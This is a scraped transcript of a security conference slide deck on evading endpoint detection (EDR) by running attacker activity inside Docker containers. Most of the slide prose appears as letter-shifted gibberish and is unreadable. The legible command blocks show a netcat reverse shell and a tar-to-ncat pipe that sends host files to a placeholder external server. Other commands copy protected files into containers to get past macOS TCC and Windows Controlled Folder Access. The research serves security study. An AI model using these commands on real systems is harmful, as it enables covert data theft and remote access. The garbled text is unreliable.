Bring Your Own Container: When Containers Turn the Key to EDR Bypass/byoc-avtokyo2024

/PWUI 4BU "LBUTVLJ(BNFT*OD4UFSSB4FDVSJUZ$P -UE 5BJDIJ,PUBLF #SJOH:PVS0XO$POUBJOFS 8IFO$POUBJOFST5VSOUIF,FZUP&%3#ZQBTT "750,:0!5,/*()5$-6#🍻

8IP*BN🦦 w /BNF5BJDIJ,PUBLF w (JU)VCULNSV w +PC $50$P'PVOEFS!4UFSSB4FDVSJUZ$P -UE 4FDVSJUZ&OHJOFFS!"LBUTVLJ(BNFT*OD
w 'BWPSJUFWVMOFSBCJMJUZ w "MDPIPMJOKFDUJPO🍷PONZTFMG

5PEBZ`T5PQJD&%3#ZQBTT &WBTJPO w 5PEBZ MBSHFFOUFSQSJTFFOEQPJOUTIBWFUIF&%3JOTUBMMFE w .BMXBSFFYFDVUJPOCZBOBUUBDLFSXJMMCFEFUFDUFECZUIF&%3 JGUIFSFJTOPNFDIBOJTNUPGPSCZQBTTJOH w *UJTJNQPSUBOUGPSBUUBDLFSTUPCZQBTTUIF&%3JOPSEFSUPDPNQMFUF
UIFJSPCKFDUJWFT w 5PEBZTQSFTFOUBUJPOQSFTFOUTlCMJOETQPUTzJO&%3T

⚠8BSOJOH⚠ w 5PEBZTQSFTFOUBUJPOJTBCPVUBUUBDLUFDIOJRVFT w #VUJUJTOPUBQSFTFOUBUJPOSFDPNNFOEJOHBUUBDLT w &%3CZQBTTUFDIOJRVFTJTOPUKVTUGPSBUUBDLFST w .BOZNBMXBSFOPXIBWF&%3CZQBTTDBQBCJMJUJFT LOPXMFEHFUIBU
QFOUFTUFSTBOEJODJEFOUSFTQPOEFSTTIPVMEBMTPCFBXBSFPG w %POUBUUBDLlSFBMFOWJSPONFOUTzUIBUZPVEPOUNBOBHF

"UUBDLTDFOBSJP 6TJOH4/4BOE&NBJMUPTFOEQIJTIJOHNFTTBHFTUPFNQMPZFFTPG UBSHFUDPNQBOJFT "OBUUBDLFSQPTJOHBTBSFDSVJUFS"OBUUBDLFSQBTTFTNBMXBSFVOEFS UIFHVJTFPGBDPEJOHUFTU &NQMPZFFTXIPCFMJFWFEJUXBTBDPEJOHBTTJHONFOUFYFDVUFE NBMXBSF
6OUJMUIFNBMXBSFJTFYFDVUFE "UUBDLFS &NQMPZFF &NQMPZFF1$ 'BLF$PEJOH5FTU 3VO.BMXBSF

"UUBDLTDFOBSJP w -B[BSVT(SPVQUBSHFUFEB4QBOJTIBFSPTQBDFDPNQBOZ w "UUBDLFSTEJTHVJTFENBMXBSFBTBMFHJUJNBUFDPEJOHUFTU w &NQMPZFFTXFSFMVSFE VTJOHDPEJOHUFTU w 4PDJBMFOHJOFFSJOHUFDIOJRVFT
BJNFEBUKPCTFFLFST 6OUJMUIFNBMXBSFJTFYFDVUFE IUUQTXXXXFMJWFTFDVSJUZDPNFOFTFUSFTFBSDIMB[BSVTMVSJOHFNQMPZFFTUSPKBOJ[FEDPEJOHDIBMMFOHFTDBTFTQBOJTIBFSPTQBDFDPNQBOZ

1IJTIJOHTFOUUPNFUISPVHI(JU)VC w 1SFUFOEJOHUPCFGSPN(JU)VC4FDVSJUZ5FBN VTJOHBSFQPTJUPSZJTTVF 6OUJMUIFNBMXBSFJTFYFDVUFE

.BJO$BUFHPSJFTPG&%3#ZQBTT w "WPJEJOHUIF&%3 w 1SPYZJOHUSB ff i D FUD w
#MFOEJOHJOUPUIFFOWJSPONFOU w -FWFSBHFBQQXJUIMFHJUJNBUF TJHOJOH FUD w 5IF&%3UBNQFSJOH w 1BUDIJOHUIFNFNPSZPGUIF&%3 QSPDFTT FUD w 0QFSBUJOHJOCMJOETQPUT w &YQMPJUJOHMBDLPGWJTJCJMJUZ 5IFDPNCJOBUJPOPGUFDIOJRVFTJOWBSJPVTDBUFHPSJFT NBLFTCZQBTTJOHQPTTJCMF IUUQTHJUIVCDPNOBLTZOUBMLTCMPCNBJO%&'$0/%JFHP$BQSJPUUJ %&'$0/"EWFSTBSZ7JMMBHF1ZUIPOWT.PEFSO%FGFOTFTQEG

$BTF4UVEZ -FWFSBHFUIF8JOEPXT'JMUFSJOH1MBUGPSN 8'1 -FWFSBHF1PPSMZ4VQQPSUFE1SPHSBNNJOH-BOHVBHFT #SJOH:PVS0XO7VMOFSBCMF%SJWFS &%3#ZQBTT

-FWFSBHFUIF8JOEPXT'JMUFSJOH1MBUGPSN w 5IF8'1JTBQPXFSGVMGSBNFXPSLCVJMUJOUP8JOEPXTGPSDSFBUJOH OFUXPSL fi MUFSJOHBOETFDVSJUZBQQMJDBUJPOT w 1SPWJEFTEFWFMPQFSTXJUIBO"1*UPEF fi OFDVTUPNSVMFTUPNPOJUPS
BOECMPDLOFUXPSLUSB ffi DCBTFEPO*1BEESFTT QPSU QSPUPDPM BQQMJDBUJPO FUD w 6TFEJO fi SFXBMMT BOUJWJSVTTPGUXBSFUPQSPUFDUTZTUFNTBOEOFUXPSLT 8IBU`T8'1

-FWFSBHFUIF8JOEPXT'JMUFSJOH1MBUGPSN w 6TFUIF8'1UPEZOBNJDBMMZJEFOUJGZSVOOJOH&%3QSPDFTTBOEDSFBUF 8'1 fi MUFSTUIBUCMPDLPVUCPVOEOFUXPSLDPNNVOJDBUJPOT w 5IJTF ff FDUJWFMZQSFWFOUT&%3GSPNTFOEJOHBMFSUTUPUIFTFSWFS
$BTF4UVEZ &%31SPDFTT &%34FSWFS ❌ 8'1 fi MUFST DVUOFUXPSLGSPN&%3

-FWFSBHFUIF8JOEPXT'JMUFSJOH1MBUGPSN 0445PPMT OFUFSP&%34JMFODFS IUUQTHJUIVCDPNOFUFSP&%34JMFODFS TFO[FF&%31SJTPO IUUQTHJUIVCDPNTFO[FF&%31SJTPO

-FWFSBHFUIF8JOEPXT'JMUFSJOH1MBUGPSN w BNKDZCFS&%3/PJTF.BLFS IUUQTHJUIVCDPNBNKDZCFS&%3/PJTF.BLFS 044GPSEFUFDUJPO

-FWFSBHFQPPSMZTVQQPSUFEMBOHVBHFT w &%3TUZQJDBMMZPWFSMPPLTDSJQU fi MFT GPDVTJOHJOTUFBEPOCJOBSJFTGPS JNQMBOUEFMJWFSZ w $PO fi
HVSFEUPEFUFDUIJHIFOUSPQZPSTVTQJDJPVTTFDUJPOTJOCJOBSJFT OPUTJNQMFTDSJQUT w &WFSZTDSJQUJOHJOUFSQSFUFSJTTJHOFECZJUTWFOEPS XJUIFBDI DFSUJ fi DBUFCFJOHWBMJE w 4DSJQUJOUFSQSFUFSJTOPUEFUFDUFEBGUFSQSPDFFEJOHXJUIJOTUBMMBUJPO $BTF4UVEZ IUUQTHJUIVCDPNPMELJOHDPOF#:04*

-FWFSBHFQPPSMZTVQQPSUFEMBOHVBHFT w #:04* #SJOH:PVS0XO4DSJQUJOH*OUFSQSFUFS CZPMELJOHDPOF w 4UFQ%PXOMPBETUIF;*1 fi MFGPS1)1JOUFSQSFUFS
CVJMEGPS8JOEPXT GSPNUIFP ff i DJBM1)1TJUF w 4UFQ&YUSBDUTUIFDPOUFOUTPGUIF;*1 fi MFJOUIF$a8JOEPXTa5FNQ w 4UFQ%PXOMPBETB1)1FYQMPJUBOETBWFTJU JOUIFFYUSBDUFE1)1EJSFDUPSZBU$a8JOEPXTa5FNQaQIQ w 4UFQ&YFDVUFTUIFQIQFYFCJOBSZ UIF1)1JOUFSQSFUFS MPDBUFE JO$a8JOEPXTa5FNQaQIQ SVOOJOHB1)1FYQMPJU fi MF $BTF4UVEZ 1)1 IUUQTHJUIVCDPNPMELJOHDPOF#:04*

-FWFSBHFQPPSMZTVQQPSUFEMBOHVBHFT w PMELJOHDPOF#:04* IUUQTHJUIVCDPNPMELJOHDPOF#:04* UIF0445PPM

-FWFSBHFQPPSMZTVQQPSUFEMBOHVBHFT w 1ZUIPOWT.PEFSO%FGFOTFT%&'$0/"EWFSTBSZ7JMMBHF CZ%JFHP$BQSJPUUJ w IUUQTHJUIVCDPNOBLTZOUBMLTCMPCNBJO%&'$0/%JFHP$BQSJPUUJ %&'$0/"EWFSTBSZ7JMMBHF1ZUIPOWT.PEFSO%FGFOTFTQEG w *NQPSUJOHQZUIPONPEVMFTEZOBNJDBMMZ BOEJONFNPSZUPCSJOHUIFP
ff FOTJWFUPPM TUSBJHIUJOUPUIFJOUFSQSFUFS $BTF4UVEZ 1ZUIPO

#SJOH:PVS0XO7VMOFSBCMF%SJWFS w %SJWFSTBSFTPGUXBSFUIBUBMMPXTUIFPQFSBUJOHTZTUFNUPJOUFSBDUXJUI BMMUIFEJ ff FSFOUQIZTJDBMQBSUTPGB1$ w %SJWFSTIBWFIJHIMFWFMQSJWJMFHFT w "UUBDLFSTFYQMPJULOPXOWVMOFSBCJMJUJFTJOMFHJUJNBUFESJWFSTUPCZQBTT
UIF&%3 w "JNJOHUP&MFWBUF1SJWJMFHFT $BTF4UVEZ

#SJOH:PVS0XO7VMOFSBCMF%SJWFS w 4UFQ*OTUBMMBWVMOFSBCMFTJHOFEESJWFSPOUPUIFTZTUFN w 4UFQ*OKFDUFEBSCJUSBSZDPEFJOUPBESJWFS MFWFSBHJOHMPDBMQSJWJMFHF FTDBMBUJPO w 4UFQ.PEJGZLFSOFMNFNPSZUPSFNPWFIPPLTJOTUBMMFECZ&%3 $BTF4UVEZ

#SJOH:PVS0XO7VMOFSBCMF%SJWFS w #FOF fi UT👍 w /POFFEUPTFBSDIGPSQSJWJMFHFFTDBMBUJPOWVMOFSBCJMJUZ XJUIJOUIFDPNQSPNJTFE1$ w 5PPMFEBOEFBTZUPVTF
w 7VMOFSBCMFESJWFSTJOGPSNBUJPOJTBWBJMBCMFPOUIF8FCTJUF w -0-%SJWFST IUUQTXXXMPMESJWFSTJP $BTF4UVEZ

.JDSPTPGUWT7VMOFSBCMF%SJWFST w .JDSPTPGUSFDFOUMZEFQMPZFEUIF7VMOFSBCMF%SJWFS#MPDLMJTUCZEFGBVMU TUBSUJOHJO8JOEPXT) w 6OGPSUVOBUFMZ UIFCMPDLMJTUTVQEBUFTBVUPNBUJDBMMZEFQMPZFEUZQJDBMMZ POMZPODFPSUXJDFBZFBS😭 w
#VUXJUI.JDSPTPGU*OUVOF"QQ$POUSPMGPS#VTJOFTT ZPVDBOBQQMZUIF MBUFTUCMPDLMJTUTUIBUIBWFCFFOQVCMJTIFE w *EPOULOPXIPXPGUFOUIFWVMOFSBCMFESJWFSCMPDLMJTUCJOBSJFTBSF VQEBUFEʜ $BTF4UVEZ IUUQTMFBSONJDSPTPGUDPNFOVTXJOEPXTTFDVSJUZBQQMJDBUJPOTFDVSJUZBQQMJDBUJPODPOUSPM BQQDPOUSPMGPSCVTJOFTTEFTJHONJDSPTPGUSFDPNNFOEFEESJWFSCMPDLSVMFT

4VNNBSZ w 5PCZQBTTBO&%3 JUJTPGUFOBDBTFPGMFWFSBHJOHTPNFUIJOHUIBUUIF &%3USVTUT w 8JOEPXT`TGVODUJPOT w -FHJUJNBUFESJWFST w
*UJTPGUFOQPTTJCMFUPVTFTPNFUIJOHTUIBUBSFQPPSMZTVQQPSUFEJO&%3T w 1)1 w 1ZUIPO $BTF4UVEZ

"XFTPNF&%3#ZQBTT .PSF$BTF4UVEJFT

/FX #MJOETQPU%PDLFS$POUBJOFS w %PDLFSJTBQMBUGPSNGPSDSFBUJOH EJTUSJCVUJOH BOESVOOJOHDPOUBJOFST w $POUBJOFSTQBDLBHFBQQMJDBUJPOTXJUIBMMOFDFTTBSZEFQFOEFODJFT FOTVSJOHDPOTJTUFODZBDSPTTEJ
ff FSFOUTZTUFNT w $POUBJOFSTBMMPXUIFEFWFMPQNFOUFOWJSPONFOUUPCFUIFTBNFGPS EJ ff FSFOU04VTFSTBOEUPEFWFMPQJOUIFTBNFFOWJSPONFOUBTUIF QSPEVDUJPOFOWJSPONFOU w $POUBJOFSTQSPWJEFJTPMBUJPO CVUBMTPCZQBTT&%3NPOJUPSJOH

w &%3TJTVOBCMFUPNPOJUPSBDUJWJUJFTJOTJEFUIFDPOUBJOFS w 4UFQ1SFQBSFBDPOUBJOFSUIBUDPOUBJOTUIFEBUBZPVXBOUUPCSJOH PVUTJEFJOUIF1$ w 4UFQ&TUBCMJTIBDPOOFDUJPOGSPNUIFDPOUBJOFSUPUIF$TFSWFSUP PVUTJEFUIFEBUB CZQBTTJOH&%3NPOJUPSJOH
/FX #MJOETQPU%PDLFS$POUBJOFS JNQPSUBOUEBUB JNQPSUBOUEBUB 1$XJUI&%3 $ %PDLFS$POUBJOFS

w &%3TJTVOBCMFUPNPOJUPSBDUJWJUJFTJOTJEFUIFDPOUBJOFS w 5IJTUFDIOJRVFJTOBNFE#:0$ #SJOH:PVS0XO$POUBJOFS JNQPSUBOUEBUB JNQPSUBOUEBUB 1$XJUI&%3 $
%PDLFS$POUBJOFS #SJOH:PVS0XO$POUBJOFS #:0$ /FX&%3#ZQBTT5FDIOJRVF

4UFQ)PXUPCSJOHEBUBJOUPUIFDPOUBJOFS w #ZNPVOUJOHUIFIPTUEJSFDUPSZJOBDPOUBJOFS w 8IFOBDPOUBJOFSJTTUBSUFEXJUIUIF SNPQUJPO UIFDPOUBJOFSJTBVUPNBUJDBMMZEFMFUFEVQPOFYJU w /PUSBDFTPGDPNNBOETFYFDVUFEJOUIFDPOUBJOFSBSFMFGU
POUIFIPTU #SJOH:PVS0XO$POUBJOFS #:0$ $ docker run --rm -v ~/Desktop:/lib/modules -it ubuntu /bin/bash # ls /lib/modules // Can check files on the Desktop

w $SFBUJOHBDPOUBJOFSUIBUDPOUBJOTUIFIPTUEBUB w %PDLFS fi MF w 4IFMM 4UFQ)PXUPCSJOHEBUBJOUPUIFDPOUBJOFS
#SJOH:PVS0XO$POUBJOFS #:0$ FROM ubuntu:latest COPY ./secret /lib/modules/ RUN apt update && apt install -y ncat CMD ["/bin/bash"] $ docker build -t byoc-poc . $ docker run --rm -it byoc-poc /bin/bash

w &YJTUJOHDPOUBJOFSTDBOCFMFWFSBHFEPOUIFDPNQSPNJTFEFOEQPJOU w $PQZMPDBM fi MFTJOUPBDPOUBJOFSUPBOFYJTUJOHDPOUBJOFS w 4IFMM 4UFQ)PXUPCSJOHEBUBJOUPUIFDPOUBJOFS
#SJOH:PVS0XO$POUBJOFS #:0$ $ docker cp secret.txt <Container ID>:/lib/modules/ Successfully copied 2.05kB to <Container ID>:/lib/modules/ $ docker exec -it <Container ID> /bin/bash

4UFQ)PXUPCSJOHEBUBPVUPGUIFDPOUBJOFS w &TUBCMJTIBSFWFSTFTIFMMXJUIUIF$TFSWFS w /DBUCZ/NBQJTVTFEIFSF CVUUIFSFBSFBWBSJFUZPGNFUIPET w $POUBJOFS #SJOH:PVS0XO$POUBJOFS
#:0$ # apt update # apt install ncat # ncat XX.XX.XX.XX 3333 -e /bin/bash

w #SJOHUIFEBUBUPBOFYUFSOBMTFSWFS w $POUBJOFS #SJOH:PVS0XO$POUBJOFS #:0$ 4UFQ)PXUPCSJOHEBUBPVUPGUIFDPOUBJOFS # apt
update # apt install ncat # tar cf - /lib/modules/ | ncat XX.XX.XX.XX 3333

#FOFGJUT👍 w "MMPXTZPVUPPQFSBUFTIFMMGSFFGSPN&%3NPOJUPSJOH w %PDLFSJTPGUFOJOTUBMMFEPOEFWFMPQFST1$TBOETFSWFST NBLJOHJU FBTZUPVTF w 6TFQSFQBSFE%PDLFSJNBHFTUPDSFBUFBGBNJMJBSFOWJSPONFOUPOUIF DPNQSPNJTFEFOEQPJOU
#SJOH:PVS0XO$POUBJOFS #:0$

#FOFGJUT👍 w 1FSTJTUFODFPOUIFOFUXPSL w $BOCFVTFEBTBTUFQQJOHTUPOFGPSBUUBDLTPOPUIFSFOEQPJOUTPO UIFIPTUOFUXPSL #SJOH:PVS0XO$POUBJOFS #:0$ -BUFSBMNPWFNFOUPOBOFUXPSL

$POT😭 w 6OBCMFUPGSFFMZNBOJQVMBUFUIFIPTUPOXIJDIUIFDPOUBJOFSJT SVOOJOH w 0OMZ fi MFTCSPVHIUJOUPUIFDPOUBJOFSDBOCFDPOUSPMMFE w %J
ffi DVMUUPEPGSPNJOTUBMMJOH%PDLFS CFDBVTFJUSFRVJSFTIJHIQSJWJMFHFTUPJOTUBMM%PDLFS #SJOH:PVS0XO$POUBJOFS #:0$

5$$ w 5$$ 5SBOTQBSFODZ $POTFOU BOE$POUSPM w 4FDVSJUZQSPUPDPMGPDVTJOHPOSFHVMBUJOHNBD04BQQQFSNJTTJPOT w
8IFONBD04BQQBDDFTTFTBEJSFDUPSZ GPSUIF fi STUUJNF NBD04SFRVFTUTQFSNJTTJPO CZQSPNQU #SJOH:PVS0XO$POUBJOFSWTNBD04

5$$ w $IFDLBMMPXFEEJSFDUPSJFT w 4ZTUFN4FUUJOHT ˠ1SJWBDZ4FDVSJUZ ˠ'JMFTBOE'PMEFST #SJOH:PVS0XO$POUBJOFSWTNBD04

5$$😭 w "QSPNQUGPSQFSNJTTJPOBQQFBSTBOE UIFVTFSCFDPNFTBXBSFPGUIFBUUBDL w *GUIFVTFSEPFTOPUHJWFQFSNJTTJPO UIFFSSPSNFTTBHFloperation not permittedzBQQFBST
#SJOH:PVS0XO$POUBJOFSWTNBD04 $ docker run --rm -v ~/Downloads:/lib/modules -it ubuntu /bin/bash docker: Error response from daemon: error while creating mount source path '/host_mnt/Users/taichi.kotake/Downloads': mkdir / host_mnt/Users/taichi.kotake/Downloads: operation not permitted.

w 1BUIPGUIFIPNFEJSFDUPSZQSPUFDUFECZ5$$ w d%PDVNFOUT w d%PXOMPBET w d%FTLUPQ #SJOH:PVS0XO$POUBJOFSWTNBD04
5$$😭

5$$#MJOE4QPU w .BOZEJSFDUPSJFTOPUQSPUFDUFECZ5$$ w 5IFTFEJSFDUPSJFTDBOCFBDDFTTFEGSPN%PDLFSBQQ w UNQ w 6TFSDSFBUFEGPMEFST w
EPUGPMEFST dBXT dTTI w %FWFMPQNFOUGPMEFST dEFW dDPEF #SJOH:PVS0XO$POUBJOFSWTNBD04

5$$#ZQBTT w #VU XBOUUPPQFSBUF fi MFTJOEJSFDUPSJFTQSPUFDUFECZ5$$ w +VTUDPQZ fi MFTGSPNBEJSFDUPSZJTNPOJUPSFECZ5$$CVUBMMPXFE
BDDFTTGSPNUIF5FSNJOBMBQQUPBOVONPOJUPSFEEJSFDUPSZMJLFUNQ #SJOH:PVS0XO$POUBJOFSWTNBD04 UNQ %PDLFSBQQ d%FTLUPQ d%PDVNFOUT d%PXOMPBET FUD 1SPUFDUFEEJSCZ5$$ 6ONPOJUPSFEEJS CZ5$$ $PQZ fi MFT

5$$#ZQBTT w 4UFQ%JSFDUPSJFTUIBUBSFBMMPXFEUPCFBDDFTTFEGSPN5FSNJOBMBQQ DBOCFGPVOEJOUIFTIFMMIJTUPSZ w 4UFQ$PQZ fi MFTGSPNUIFGPVOEEJSFDUPSZUPUNQ w 4UFQ1VU
fi MFTJOUNQJOUPUIFDPOUBJOFSBOEGSFFMZPQFSBUF fi MFT #SJOH:PVS0XO$POUBJOFSWTNBD04 $ history # Check the list of dir accessible from Terminal.app $ cp ~/Desktop/secret.png /tmp/ $ docker run --rm -v /tmp:/lib/modules -it ubuntu /bin/bash # tar cf - /lib/modules/ | ncat XX.XX.XX.XX 3333

-JOVYPGUFOSFRVJSFTTVEP w 0GUFOOPUDPO fi HVSFEUPBMMPXHFOFSBMVTFSTUPSVOEPDLFS w 3PPUQSJWJMFHFTBSFSFRVJSFEUPJOTUBMM%PDLFS
$ docker ps permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http:// %2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json": dial unix / var/run/docker.sock: connect: permission denied #SJOH:PVS0XO$POUBJOFSWT-JOVY

/PXBMMCZEFGBVMU w #ZEFGBVMUOPSFTUSJDUJPOTPOQFSEJSFDUPSZBDDFTTGSPNBQQT #SJOH:PVS0XO$POUBJOFSWT-JOVY $ docker run --rm
-v ~/Downloads:/lib/modules -it ubuntu /bin/bash

#VU"QQ"SNPSʜ w #VUJG"QQ"SNPSJTDPO fi HVSFE BDDFTTJTSFTUSJDUFE w "QQ"SNPS JTBOFBTZUPVTF-JOVY4FDVSJUZ.PEVMFJNQMFNFOUBUJPO UIBUSFTUSJDUTBQQT`DBQBCJMJUJFTBOEQFSNJTTJPOT
#SJOH:PVS0XO$POUBJOFSWT-JOVY IUUQTHJUMBCDPNBQQBSNPSBQQBSNPS

%PDLFS%FTLUPQ%JBMPH w 8JOEPXTPOMZEJBMPHBQQFBSTXIFOUSZJOHUPNPVOUBEJSFDUPSZ JOBDPOUBJOFS #SJOH:PVS0XO$POUBJOFSWT8JOEPXT $ docker run --rm
-v C:\Users\taichi.kotake\Downloads:/lib/modules -it ubuntu /bin/bash

%PDLFS%FTLUPQ%JBMPH#ZQBTT w $PQZJOH fi MFTUPUIFDPOUBJOFSEPFTOPUUSJHHFSBEJBMPH w /FFEUPDSFBUFBDPOUBJOFS fi STUPSVTFBOFYJTUJOHDPOUBJOFS
#SJOH:PVS0XO$POUBJOFSWT8JOEPXT $ docker run -d -p 8080:80 nginx # Daemonized to prevent termination $ docker cp C:\Users\taichi.kotake\Downloads\secret.txt <container ID>:/lib/modules

$POUSPMMFEGPMEFSBDDFTT🤔 w $POUSPMMFEGPMEFSBDDFTTJTP ff CZEFGBVMU w )FMQZPVQSPUFDU WBMVBCMFEBUBGSPNNBMXBSF w
*ODMVEFEXJUI8JOEPXT BOE8JOEPXT4FSWFS #SJOH:PVS0XO$POUBJOFSWT8JOEPXT IUUQTMFBSONJDSPTPGUDPNFOVTEFGFOEFSFOEQPJOUFOBCMFDPOUSPMMFEGPMEFST > Set-MpPreference -EnableControlledFolderAccess Enabled

$POUSPMMFEGPMEFSBDDFTT🤔 w "OPUJ fi DBUJPOBQQFBSTPO1$XIFSFBOBQQBUUFNQUFEUPNBLF DIBOHFTUPB fi MFJOBQSPUFDUFEGPMEFS w &Y8SJUJOHB
fi MFGSPN1PXFS4IFMM w :PVDBODVTUPNJ[FUIFOPUJ fi DBUJPOXJUIZPVSDPNQBOZEFUBJMTBOE DPOUBDUJOGPSNBUJPO #SJOH:PVS0XO$POUBJOFSWT8JOEPXT IUUQTMFBSONJDSPTPGUDPNFOVTEFGFOEFSFOEQPJOUDPOUSPMMFEGPMEFST

w $a6TFSTaVTFSOBNFa%PDVNFOUT w $a6TFSTaVTFSOBNFa'BWPSJUFT w $a6TFSTaVTFSOBNFa.VTJD w $a6TFSTaVTFSOBNFa1JDUVSFT w $a6TFSTaVTFSOBNFa7JEFPT
#SJOH:PVS0XO$POUBJOFSWT8JOEPXT IUUQTMFBSONJDSPTPGUDPNFOVTEFGFOEFSFOEQPJOUDPOUSPMMFEGPMEFST w $a6TFSTa1VCMJDa%PDVNFOUT w $a6TFSTa1VCMJDa.VTJD w $a6TFSTa1VCMJDa1JDUVSFT w $a6TFSTa1VCMJDa7JEFPT 5IF8JOEPXTTZTUFNTGPMEFSTUIBUBSFQSPUFDUFECZEFGBVMUBSF $POUSPMMFEGPMEFSBDDFTT🤔

w #VUOPSFTUSJDUJPOTPOQFSEJSFDUPSZBDDFTTGSPN%PDLFS$POUBJOFST w .BZCFCFDBVTF%PDLFSJTBUSVTUFEBQQMJDBUJPOCZ8JOEPXT w #ZDPQZJOHUIF fi MFTUPUIFDPOUBJOFS UIF%PDLFSEJBMPHEPFTOPU BQQFBSBOE$POUSPMMFEGPMEFSBDDFTTJTOPUUSJHHFSFE
#SJOH:PVS0XO$POUBJOFSWT8JOEPXT $POUSPMMFEGPMEFSBDDFTT😊 $ docker run -d -p 8080:80 nginx # Daemonized to prevent termination $ docker cp C:\Users\taichi.kotake\Downloads\secret.txt <container ID>:/lib/modules

'VUVSF8PSL w 8IFO%PDLFSJTGSFFMZPQFSBCMF ZPVBSFGSFFUPDSFBUFBO FOWJSPONFOUJOXIJDIZPVDBOFTDBQFUIFDPOUBJOFSPO-JOVY w $BONBOJQVMBUFUIFIPTUTFOWJSPONFOUGSPNJOTJEFUIFDPOUBJOFS w #:0$NBZCFNPSFDPOWFOJFOU w
#VUJGZPVDBOFYFDVUFEPDLFSDQDPNNBOE JUNBZOPUCFVTFGVM

'VUVSF8PSL w $SFBUJOHBUFTUFOWJSPONFOUXIFSFNVMUJQMF&%3TXPSL w .BZCFQVSDIBTJOHNVMUJQMF&%3TJTEJ ffi DVMUʜ w 7FSZGFX&%3TBWBJMBCMFGPSQVSDIBTFXJUIMJDFOTF w
4PNFBSFGSFF w 8B[VICZ8B[VI *OD w 0QFO&%3CZ$PNPEP4FDVSJUZ4PMVUJPOT *OD

4VNNBSZ w &%3TJTOPUNPOJUPSJOHJOTJEF%PDLFS$POUBJOFS w $BOCFVTFEGPS&%3CZQBTTJG%PDLFSJTBMSFBEZJOTUBMMFE w NBD04BOE8JOEPXTIBTQSPUFDUJPOGPSEJSFDUPSJFT w #VUUIBUDBOBMTPCFCZQBTTFE w
%POUBUUBDLSFBMFOWJSPONFOUTUIBUZPVEPOUNBOBHF #SJOH:PVS0XO$POUBJOFS

5IBOLZPV🍻

"QQFOEJY w 0O+BOVBSZUI UIF/BUJPOBM1PMJDF"HFODZPG+BQBO BOOPVODFEBNFUIPEGPSCZQBTTJOH&%3VTJOH8JOEPXT4BOECPY w 8JOEPXT4BOECPYJTTPGUXBSFUIBUJTJODMVEFEBTTUBOEBSE w JO8JOEPXT1SP PS&OUFSQSJTFWFSTJPOPSMBUFS
PS8JOEPXT FYDMVEJOH8JOEPXT)PNF&EJUJPO #SJOH:PVS0XO8JOEPXT4BOECPY IUUQTXXXOQBHPKQCVSFBVDZCFSLPIPDBVUJPODBVUJPOIUNM

"QQFOEJY w 8JOEPXT4BOECPYJTBUFNQPSBSZWJSUVBMJ[FE8JOEPXTEFTLUPQ FOWJSPONFOUUIBUSVOTTFQBSBUFMZGSPNUIFIPTUDPNQVUFS w "UUBDLFSTBSFFYQMPJUJOHUIF8JOEPXT4BOECPYTUBSUVQTFUUJOHTUPSVO NBMXBSFTUPSFEPOUIFIPTUDPNQVUFSXJUIJO8JOEPXT4BOECPY w -JLF#:0$ JUJTQPTTJCMFUPFYFDVUFNBMXBSF
XJUIPVUCFJOHEFUFDUFECZ&%3POUIFIPTUDPNQVUFS #SJOH:PVS0XO8JOEPXT4BOECPY

"QQFOEJY w *GUIFIPTUDPNQVUFSJTTIVUEPXOPSSFTUBSUFE UIFUSBDFTJO8JOEPXT 4BOECPYXJMMCFEFMFUFE NBLJOHJUEJ ffi DVMUUPJOWFTUJHBUFUIFBSUJGBDUT w 5IJTNFUIPEJTUIPVHIUUPIBWFCFFOVTFECZB"15HSPVQDBMMFE
l.JSSPS'BDFz BLB l&BSUI,BTIBz XIJDIJTTVTQFDUFEPGCFJOH JOWPMWFEJOBUUBDLTCZ$IJOBTJODFBUMFBTU+VOF #SJOH:PVS0XO8JOEPXT4BOECPY

Bring Your Own Container: When Containers Turn ...

Bring Your Own Container: When Containers Turn the Key to EDR Bypass/byoc-avtokyo2024

More Decks by @tkmru

Other Decks in Technology

Featured

Transcript